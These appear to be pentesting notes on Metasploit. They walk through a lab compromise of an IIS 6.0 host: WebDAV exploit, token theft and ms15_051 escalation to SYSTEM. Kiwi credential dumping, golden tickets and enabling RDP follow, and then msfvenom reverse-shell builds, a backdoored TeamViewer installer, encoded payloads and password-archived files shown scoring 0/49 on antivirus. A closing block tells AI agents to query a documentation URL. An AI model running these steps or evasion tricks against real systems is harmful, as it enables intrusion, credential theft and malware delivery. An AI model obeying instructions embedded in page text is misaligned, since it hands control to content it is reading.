``` To list all running jobs, we can use the `jobs -l` command. To kill a specific job, look at the index no. of the job and use the `kill [index no.]` command. Use the `jobs -K` command to kill all running jobs. ### Meterpreter The `Meterpreter` Payload is a specific type of multi-faceted, extensible Payload that uses `DLL injection` to ensure the connection to the victim host is stable and difficult to detect using simple checks and can be configured to be persistent across reboots or system changes. Furthermore, Meterpreter resides entirely in the memory of the remote host and leaves no traces on the hard drive, making it difficult to detect with conventional forensic techniques. To run Meterpreter, we only need to select any version of it from the `show payloads` output, taking into consideration the type of connection and OS we are attacking. When the exploit is completed, the following events occur: * The target executes the initial stager. This is usually a bind, reverse, findtag, passivex, etc. * The stager loads the DLL prefixed with Reflective. The Reflective stub handles the loading/injection of the DLL. * The Meterpreter core initializes, establishes an AES-encrypted link over the socket, and sends a GET. Metasploit receives this GET and configures the client. * Lastly, Meterpreter loads extensions. It will always load `stdapi` and load `priv` if the module gives administrative rights. All of these extensions are loaded over AES encryption. Whenever the Meterpreter Payload is sent and run on the target system, we receive a `Meterpreter shell`. We can then immediately issue the `help` command to see what the Meterpreter shell is capable of. ### Using Meterpreter We have already delved into the basics of Meterpreter in the Payloads section. Now, we will look at the real strengths of the Meterpreter shell and how it can bolster the assessment's effectiveness and save time during an engagement. We start by running a basic scan against a known target. We will do this a-la-carte, doing everything from inside msfconsole to benefit from the data tracking on our target. ```shell-session msf6 > db_nmap -sV -p- -T5 -A 10.10.10.15 [*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-03 09:55 UTC [*] Nmap: Nmap scan report for 10.10.10.15 [*] Nmap: Host is up (0.021s latency). [*] Nmap: Not shown: 65534 filtered ports [*] Nmap: PORT STATE SERVICE VERSION [*] Nmap: 80/tcp open http Microsoft IIS httpd 6.0 [*] Nmap: | http-methods: [*] Nmap: |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT [*] Nmap: |_http-server-header: Microsoft-IIS/6.0 [*] Nmap: |_http-title: Under Construction [*] Nmap: | http-webdav-scan: [*] Nmap: | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH [*] Nmap: | WebDAV type: Unknown [*] Nmap: | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK [*] Nmap: | Server Date: Thu, 03 Sep 2020 09:56:46 GMT [*] Nmap: |_ Server Type: Microsoft-IIS/6.0 [*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows [*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 59.74 seconds msf6 > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 10.10.10.15 Unknown device msf6 > services Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 10.10.10.15 80 tcp http open Microsoft IIS httpd 6.0 ``` We notice it is an under-construction website—nothing web-related to see here. However, looking at both the end of the webpage and the result of the Nmap scan more closely, we notice that the server is running `Microsoft IIS httpd 6.0`. So we further our research in that direction, searching for common vulnerabilities for this version of IIS. After some searching, we find the following marker for a widespread vulnerability: `CVE-2017-7269`. It also has a Metasploit module developed for it. ```shell-session msf6 > search iis_webdav_upload_asp Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/iis/iis_webdav_upload_asp 2004-12-31 excellent No Microsoft IIS WebDAV Write Access Code Execution msf6 > use 0 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/iis/iis_webdav_upload_asp) > show options Module options (exploit/windows/iis/iis_webdav_upload_asp): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The HTTP password to specify for authentication HttpUsername no The HTTP username to specify for authentication METHOD move yes Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy) PATH /metasploit%RAND%.asp yes The path to attempt to upload Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.239.181 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic ``` We proceed to set the needed parameters. For now, these would be `LHOST`and `RHOST` as everything else on the target seems to be running the default configuration. ```shell-session msf6 exploit(windows/iis/iis_webdav_upload_asp) > set RHOST 10.10.10.15 RHOST => 10.10.10.15 msf6 exploit(windows/iis/iis_webdav_upload_asp) > set LHOST tun0 LHOST => tun0 msf6 exploit(windows/iis/iis_webdav_upload_asp) > run [*] Started reverse TCP handler on 10.10.14.26:4444 [*] Checking /metasploit28857905.asp [*] Uploading 612435 bytes to /metasploit28857905.txt... [*] Moving /metasploit28857905.txt to /metasploit28857905.asp... [*] Executing /metasploit28857905.asp... [*] Sending stage (175174 bytes) to 10.10.10.15 [*] Deleting /metasploit28857905.asp (this doesn't always work)... [!] Deletion failed on /metasploit28857905.asp [403 Forbidden] [*] Meterpreter session 1 opened (10.10.14.26:4444 -> 10.10.10.15:1030) at 2020-09-03 10:10:21 +0000 meterpreter > ``` We have our Meterpreter shell. However, take a close look at the output above. We can see a `.asp` file named `metasploit28857905` exists on the target system at this very moment. Once the Meterpreter shell is obtained, as mentioned before, it will reside within memory. Therefore, the file is not needed, and removal was attempted by `msfconsole`, which failed due to access permissions. Leaving traces like these is not beneficial to the attacker and creates a huge liability. From the sysadmin's perspective, finding files that match this name type or slight variations of it can prove beneficial to stopping an attack in the middle of its tracks. Targeting regex matches against filenames or signatures as above will not even allow an attacker to spawn a Meterpreter shell before being cut down by the correctly configured security measures. We proceed further with our exploits. Upon attempting to see which user we are running on, we get an access denied message. We should try migrating our process to a user with more privilege. ```shell-session meterpreter > getuid [-] 1055: Operation failed: Access is denied. meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 216 1080 cidaemon.exe 272 4 smss.exe 292 1080 cidaemon.exe <...SNIP...> 1712 396 alg.exe 1836 592 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe 1920 396 dllhost.exe 2232 3552 svchost.exe x86 0 C:\WINDOWS\Temp\rad9E519.tmp\svchost.exe 2312 592 wmiprvse.exe 3552 1460 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe 3624 592 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe 4076 1080 cidaemon.exe meterpreter > steal_token 1836 Stolen token with username: NT AUTHORITY\NETWORK SERVICE meterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE ``` Now that we have established at least some privilege level in the system, it is time to escalate that privilege. So, we look around for anything interesting, and in the `C:\Inetpub\` location, we find an interesting folder named `AdminScripts`. However, unfortunately, we do not have permission to read what is inside it. ```cmd-session c:\Inetpub>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE Directory of c:\Inetpub 04/12/2017 05:17 PM . 04/12/2017 05:17 PM .. 04/12/2017 05:16 PM AdminScripts 09/03/2020 01:10 PM wwwroot 0 File(s) 0 bytes 4 Dir(s) 18,125,160,448 bytes free c:\Inetpub>cd AdminScripts cd AdminScripts Access is denied. ``` We can easily decide to run the local exploit suggester module, attaching it to the currently active Meterpreter session. To do so, we background the current Meterpreter session, search for the module we need, and set the SESSION option to the index number for the Meterpreter session, binding the module to it. ```shell-session meterpreter > bg Background session 1? [y/N] y msf6 exploit(windows/iis/iis_webdav_upload_asp) > search local_exploit_suggester Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester msf6 exploit(windows/iis/iis_webdav_upload_asp) > use 0 msf6 post(multi/recon/local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf6 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.15 - Collecting local exploits for x86/windows... [*] 10.10.10.15 - 34 exploit checks are being tried... nil versions are discouraged and will be deprecated in Rubygems 4 [+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed msf6 post(multi/recon/local_exploit_suggester) > ``` Running the recon module presents us with a multitude of options. Going through each separate one, we land on the `ms15_051_client_copy_image` entry, which proves to be successful. This exploit lands us directly within a root shell, giving us total control over the target system. ```shell-session msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_images [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/ms15_051_client_copy_image) > show options Module options (exploit/windows/local/ms15_051_client_copy_image): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 46.101.239.181 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows x86 msf6 exploit(windows/local/ms15_051_client_copy_image) > set session 1 session => 1 msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST tun0 LHOST => tun0 msf6 exploit(windows/local/ms15_051_client_copy_image) > run [*] Started reverse TCP handler on 10.10.14.26:4444 [*] Launching notepad to host the exploit... [+] Process 844 launched. [*] Reflectively injecting the exploit DLL into 844... [*] Injecting exploit into 844... [*] Exploit injected. Injecting payload into 844... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (175174 bytes) to 10.10.10.15 [*] Meterpreter session 2 opened (10.10.14.26:4444 -> 10.10.10.15:1031) at 2020-09-03 10:35:01 +0000 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` From here, we can proceed to use the plethora of Meterpreter functionalities. For example, extracting hashes, impersonating any process we want, and others. ### Post Post exploitation example in Windows 7: run post/multi/recon/local\_exploit\_suggester
Prior to further action, we need to move to a process that actually has the permissions that we need to interact with the lsass service, the service responsible for authentication within Windows. First, let's list the processes using the command `ps`. Note, we can see processes being run by NT AUTHORITY\SYSTEM as we have escalated permissions (even though our process doesn't). In order to interact with lsass we need to be 'living in' a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this and it'll restart if we crash it. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell. Migrate to this process with the command `migrate -N PROCESS_NAME` Issue command `getuid` to check current user and now that we've made our way to full administrator permissions we'll set our sights on looting. Mimikatz is a rather infamous password dumping tool that is incredibly useful. Load it now using the command `load kiwi` (Kiwi is the updated version of Mimikatz). Issue hashdump to get hash creds or creds\_all to retrieve all credentials.
Mimikatz allows us to create what's called a \`golden ticket\`, allowing us to authenticate anywhere with ease. What command allows us to do this? Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain: `golden_ticket_create` One last thing to note. As we have the password for the user 'Dark' we can now authenticate to the machine and access it via remote desktop (MSRDP). As this is a workstation, we'd likely kick whatever user is signed onto it off if we connect to it, however, it's always interesting to remote into machines and view them as their users do. If this hasn't already been enabled, we can enable it via the following Metasploit module: `run/use post/windows/manage/enable_rdp` ### Writing and Importing Modules To install any new Metasploit modules which have already been ported over by other users, one can choose to update their `msfconsole` from the terminal, which will ensure that all newest exploits, auxiliaries, and features will be installed in the latest version of `msfconsole`. As long as the ported modules have been pushed into the main Metasploit-framework branch on GitHub, we should be updated with the latest modules. However, if we need only a specific module and do not want to perform a full upgrade, we can download that module and install it manually. We will focus on searching ExploitDB for readily available Metasploit modules, which we can directly import into our version of `msfconsole` locally. [ExploitDB](https://www.exploit-db.com) is a great choice when searching for a custom exploit. Alternatively, if we do not want to use our web browser to search for a specific exploit within ExploitDB, we can use the CLI version, `searchsploit`. ```shell-session searchsploit -t Nagios3 --exclude=".py" ``` We have to download the `.rb` file and place it in the correct directory. The default directory where all the modules, scripts, plugins, and `msfconsole` proprietary files are stored is `/usr/share/metasploit-framework`. The critical folders are also symlinked in our home and root folders in the hidden `~/.msf4/` location. We copy it into the appropriate directory after downloading the [exploit](https://www.exploit-db.com/exploits/9861). Note that our home folder `.msf4` location might not have all the folder structure that the `/usr/share/metasploit-framework/` one might have. So, we will just need to `mkdir` the appropriate folders so that the structure is the same as the original folder so that `msfconsole` can find the new modules. After that, we will be proceeding with copying the `.rb` script directly into the primary location. ```shell-session oflavioc@htb[/htb]$ cp ~/Downloads/9861.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/nagios3_command_injection.rb oflavioc@htb[/htb]$ msfconsole -m /usr/share/metasploit-framework/modules/ ``` ```shell-session msf6> loadpath /usr/share/metasploit-framework/modules/ ``` Alternatively, we can also launch `msfconsole` and run the `reload_all` command for the newly installed module to appear in the list. After the command is run and no errors are reported, try either the `search [name]` function inside `msfconsole` or directly with the `use [module-path]` to jump straight into the newly installed module. ## **MSFvenom** There will be situations where we do not have direct network access to a vulnerable target machine. In these cases, we will need to get crafty in how the payload gets delivered and executed on the system. One such way may be to use `MSFvenom` to craft a payload and send it via email message or other means of social engineering to drive that user to execute the file. In addition to providing a payload with flexible delivery options, MSFvenom also allows us to `encrypt` & `encode` payloads to bypass common anti-virus detection signatures. Let's practice a bit with these concepts. We can issue the command `msfvenom -l payloads` to list all the available payloads. **`Staged`** payloads create a way for us to send over more components of our attack. We can think of it like we are "setting the stage" for something even more useful. Take for example this payload `linux/x86/shell/reverse_tcp`. When run using an exploit module in Metasploit, this payload will send a small `stage` that will be executed on the target and then call back to the `attack box` to download the remainder of the payload over the network, then executes the shellcode to establish a reverse shell. Of course, if we use Metasploit to run this payload, we will need to configure options to point to the proper IPs and port so the listener will successfully catch the shell. Keep in mind that a stage also takes up space in memory which leaves less space for the payload. What happens at each stage could vary depending on the payload. **`Stageless`** payloads do not have a stage. Take for example this payload `linux/zarch/meterpreter_reverse_tcp`. Using an exploit module in Metasploit, this payload will be sent in its entirety across a network connection without a stage. This could benefit us in environments where we do not have access to much bandwidth and latency can interfere. Staged payloads could lead to unstable shell sessions in these environments, so it would be best to select a stageless payload. In addition to this, stageless payloads can sometimes be better for evasion purposes due to less traffic passing over the network to execute the payload, especially if we deliver it by employing social engineering. #### Building A Stageless Payload Now let's build a simple stageless payload with msfvenom and break down the command. ```shell-session oflavioc@htb[/htb]$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 74 bytes Final size of elf file: 194 bytes ``` At this point, we have the payload created on our attack box. We would now need to develop a way to get that payload onto the target system. There are countless ways this can be done. Here are just some of the common ways: * Email message with the file attached. * Download link on a website. * Combined with a Metasploit exploit module (this would likely require us to already be on the internal network). * Via flash drive as part of an onsite penetration test. Once the file is on that system, it will also need to be executed. Imagine for a moment: the target machine is an Ubuntu box that an IT admin uses to manage network devices (hosting configuration scripts, accessing routers & switches, etc.). We could get them to click the file in an email we sent because they were carelessly using this system as if it was a personal computer or workstation. Evasion technique: ```shell-session oflavioc@htb[/htb]$ msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5 ``` For the most part, when a target launches a backdoored executable, nothing will appear to happen, which can raise suspicions in some cases. To improve our chances, we need to trigger the continuation of the normal execution of the launched application while pulling the payload in a separate thread from the main application. We do so with the `-k` flag as it appears above. However, even with the `-k` flag running, the target will only notice the running backdoor if they launch the backdoored executable template from a CLI environment. If they do so, a separate window will pop up with the payload, which will not close until we finish running the payload session interaction on the target. Archiving a piece of information such as a file, folder, script, executable, picture, or document and placing a password on the archive bypasses a lot of common anti-virus signatures today. However, the downside of this process is that they will be raised as notifications in the AV alarm dashboard as being unable to be scanned due to being locked with a password. An administrator can choose to manually inspect these archives to determine if they are malicious or not. ```shell-session oflavioc@htb[/htb]$ msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5 ``` Now, try archiving it two times, passwording both archives upon creation, and removing the `.rar`/`.zip`/`.7z` extension from their names. For this purpose, we can install the [RAR utility](https://www.rarlab.com/download.htm) from RARLabs, which works precisely like WinRAR on Windows. ```shell-session oflavioc@htb[/htb]$ wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz oflavioc@htb[/htb]$ tar -xzvf rarlinux-x64-612.tar.gz && cd rar oflavioc@htb[/htb]$ rar a ~/test.rar -p ~/test.js Enter password (will not be echoed): ****** Reenter password: ****** RAR 5.50 Copyright (c) 1993-2017 Alexander Roshal 11 Aug 2017 Trial version Type 'rar -?' for help Evaluation copy. Please register. Creating archive test.rar Adding test.js OK Done oflavioc@htb[/htb]$ mv test.rar test oflavioc@htb[/htb]$ ls test test.js oflavioc@htb[/htb]$ rar a test2.rar -p test Enter password (will not be echoed): ****** Reenter password: ****** RAR 5.50 Copyright (c) 1993-2017 Alexander Roshal 11 Aug 2017 Trial version Type 'rar -?' for help Evaluation copy. Please register. Creating archive test2.rar Adding test OK Done oflavioc@htb[/htb]$ mv test2.rar test2 oflavioc@htb[/htb]$ ls test test2 test.js ``` The test2 file is the final .rar archive with the extension (.rar) deleted from the name. After that, we can proceed to upload it on VirusTotal for another check. ```shell-session oflavioc@htb[/htb]$ msf-virustotal -k -f test2 [*] Using API key: [*] Please wait while I upload test2... [*] VirusTotal: Scan request successfully queued, come back later for the report [*] Sample MD5 hash : 2f25eeeea28f737917e59177be61be6d [*] Sample SHA1 hash : c31d7f02cfadd87c430c2eadf77f287db4701429 [*] Sample SHA256 hash : 76ec64197aa2ac203a5faa303db94f530802462e37b6e1128377315a93d1c2ad [*] Analysis link: https://www.virustotal.com/gui/file//detection/f--1652167804 [*] Requesting the report... [*] Received code 0. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Received code -2. Waiting for another 60 seconds... [*] Analysis Report: test2 (0 / 49): 76ec64197aa2ac203a5faa303db94f530802462e37b6e1128377315a93d1c2ad ================================================================================================= Antivirus Detected Version Result Update --------- -------- ------- ------ ------ ALYac false 1.1.3.1 20220510 Acronis false 1.2.0.108 20220426 Ad-Aware false 3.0.21.193 20220510 AhnLab-V3 false 3.21.3.10230 20220510 Antiy-AVL false 3.0 20220510 Arcabit false 1.0.0.889 20220510 Avira false 8.3.3.14 20220510 BitDefender false 7.2 20220510 BitDefenderTheta false 7.2.37796.0 20220428 Bkav false 1.3.0.9899 20220509 CAT-QuickHeal false 14.00 20220510 CMC false 2.10.2019.1 20211026 ClamAV false 0.105.0.0 20220509 Comodo false 34606 20220509 Cynet false 4.0.0.27 20220510 Cyren false 6.5.1.2 20220510 DrWeb false 7.0.56.4040 20220510 ESET-NOD32 false 25243 20220510 Emsisoft false 2021.5.0.7597 20220510 F-Secure false 18.10.978.51 20220510 FireEye false 35.24.1.0 20220510 Fortinet false 6.2.142.0 20220510 Gridinsoft false 1.0.77.174 20220510 Jiangmin false 16.0.100 20220509 K7AntiVirus false 12.12.42275 20220510 K7GW false 12.12.42275 20220510 Kingsoft false 2017.9.26.565 20220510 Lionic false 7.5 20220510 MAX false 2019.9.16.1 20220510 Malwarebytes false 4.2.2.27 20220510 MaxSecure false 1.0.0.1 20220510 McAfee-GW-Edition false v2019.1.2+3728 20220510 MicroWorld-eScan false 14.0.409.0 20220510 NANO-Antivirus false 1.0.146.25588 20220510 Panda false 4.6.4.2 20220509 Rising false 25.0.0.27 20220510 SUPERAntiSpyware false 5.6.0.1032 20220507 Sangfor false 2.14.0.0 20220507 Symantec false 1.17.0.0 20220510 TACHYON false 2022-05-10.02 20220510 Tencent false 1.0.0.1 20220510 TrendMicro-HouseCall false 10.0.0.1040 20220510 VBA32 false 5.0.0 20220506 ViRobot false 2014.3.20.0 20220510 VirIT false 9.5.191 20220509 Yandex false 5.5.2.24 20220428 Zillya false 2.0.0.4627 20220509 ZoneAlarm false 1.0 20220510 Zoner false 2.2.2.0 20220509 ``` ### Packers The term `Packer` refers to the result of an `executable compression` process where the payload is packed together with an executable program and with the decompression code in one single file. When run, the decompression code returns the backdoored executable to its original state, allowing for yet another layer of protection against file scanning mechanisms on target hosts. This process takes place transparently for the compressed executable to be run the same way as the original executable while retaining all of the original functionality. In addition, msfvenom provides the ability to compress and change the file structure of a backdoored executable and encrypt the underlying process structure. A list of popular packer software: | | | | | ----------------------------------- | --------------------------------------------------- | -------------------------------------------- | | [UPX packer](https://upx.github.io) | [The Enigma Protector](https://enigmaprotector.com) | [MPRESS](https://www.matcode.com/mpress.htm) | | Alternate EXE Packer | ExeStealth | Morphine | | MEW | Themida | | --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest-segdesc.gitbook.io/pentesting/pentest-127.0.0.1/tools/metasploit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.